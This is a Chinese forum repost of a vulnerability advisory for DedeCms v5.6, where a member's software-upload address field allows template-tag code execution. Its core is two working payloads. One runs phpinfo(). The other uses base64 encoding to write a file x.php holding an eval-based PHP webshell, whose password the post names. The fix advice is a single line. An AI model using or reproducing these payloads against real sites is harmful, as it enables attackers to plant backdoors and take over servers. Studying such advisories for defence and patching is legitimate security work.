首页
Portal
业界资讯
社区
BBS
我的家园
Space
个人空间
导读
Guide
登录
/
注册
用户名
Email
自动登录
找回密码
密码
登录
注册
搜索
搜索
本版
帖子
用户
本版
帖子
用户
帖子
好友
道具
勋章
收藏
任务
淘帖
门户
导读
设置
我的收藏
退出
腾讯QQ
微信登录
首页
›
≡≡网络技术≡≡
›
网络技术
›
DedeCms v5.6 嵌入恶意代码执行漏洞及修复
返回列表
黑客安全
DedeCms v5.6 嵌入恶意代码执行漏洞及修复
[ 复制链接 ]
灰儿
2012-10-5 15:32:26
发布时间:2011-03-02
影响版本:
DedeCms v5.6漏洞描述:
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用
<*参考 toby57*>
测试方法:
注册会员,上传软件:本地地址中填入
a{/dede:link}{dede:toby57 name\="']=0;phpinfo();//"}x{/dede:toby57},
发表后查看或修改即可执行
a{/dede:link}{dede:toby57 name\="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz5iYWlkdQ));//"}x{/dede:toby57}
生成x.php 密码:xiao直接生成一句话。密码xiao
大家懂得
安全建议:
厂商补丁:
DEDECMS
------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.dedecms.com/
临时修复:对上传软件的本地地址进行验证
本篇文章来源于 站长安全网(wwwsafe5.com) 原文出处:
http://www.safe5.com/patch/cms/php/20110304/6688.html
相关帖子
dzx2.5修改数据表时提示不可以修复
UEFI引导修复教程和工具
GPT分区环境下通过bcdboot命令完成系统的引导修复
bcdboot引导修复工具
UEFI BIOS模式下Windows系统启动过程以及引导文件修复方法
Ubuntu server 12.04 系统修复EFI(GPT)+GRUB启动菜单的方法
Dedecms最新注入漏洞分析及修复方法
江湖家居V6.0至尊版官方原版+4套模板+短信微信+手机版APP
修复江湖家居V6.0至尊版管理员后台无法给商家、工长分标
移动磁盘某分区突然无法访问变为RAW格式简单修复方法
回复
使用道具
举报
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
高级模式
B
Color
Image
Link
Quote
Code
Smilies
您需要登录后才可以回帖
登录
|
注册
回复
本版积分规则
回帖后跳转到最后一页
灰儿
管理员
9832篇
主题总数
7
总热度
提问
+关注
产品动态
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
2024-04-16
一款超级好用的Linux系统远程连接工具——FinalShell
热点推荐
1
网御星云入侵防护系统_V6000流量控制配置实例
2
电子书在线阅读和下载网址推荐
3
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
4
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
5
《再次成为神》免费下载观看
6
《為甚麼會有人類》
7
Linux下查询文件夹中文件数量的方法
8
一款超级好用的Linux系统远程连接工具——FinalShell
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
产品动态
2024-04-29
网御星云入侵防护系统_V6000流量控制配置实例
2024-04-23
电子书在线阅读和下载网址推荐
2024-04-23
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
2024-04-23
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
2024-04-20
《再次成为神》免费下载观看
2024-04-20
《為甚麼會有人類》
2024-04-16
Linux下查询文件夹中文件数量的方法
2024-04-16
一款超级好用的Linux系统远程连接工具——FinalShell
热点推荐
1
网御星云入侵防护系统_V6000流量控制配置实例
2
电子书在线阅读和下载网址推荐
3
泛微(weaver)e-cology_V10公文管理,公文环节(过程定义)设置
4
泛微(weaver)e-cology_V10公文管理,收文单位隐藏下级单位
5
《再次成为神》免费下载观看
6
《為甚麼會有人類》
7
Linux下查询文件夹中文件数量的方法
8
一款超级好用的Linux系统远程连接工具——FinalShell
热门板块
PC操作系统
启动和引导
手机操作系统
硬件相关
办公软件
多媒体技术
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。
学习中心
站长自定义文字内容,利用碎片时间,随时随地获取优质内容。
Q设计语言
了解更多
Q Design 提供商家设计所需的指导与资源,帮商家快速完成产品设计、降低生产成本。